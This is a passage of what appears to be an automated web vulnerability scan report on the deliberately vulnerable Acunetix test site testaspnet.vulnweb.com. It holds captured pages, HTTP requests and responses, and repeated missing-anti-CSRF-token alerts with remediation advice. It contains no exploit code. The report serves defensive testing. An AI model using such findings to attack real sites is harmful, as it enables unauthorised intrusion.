          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="about.aspx" id="Form1">
          Solution

          Phase: Architecture and Design

          Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        4. GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Alert tags
          Alert description

          No anti-CSRF token was found in the submitted HTML form.

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

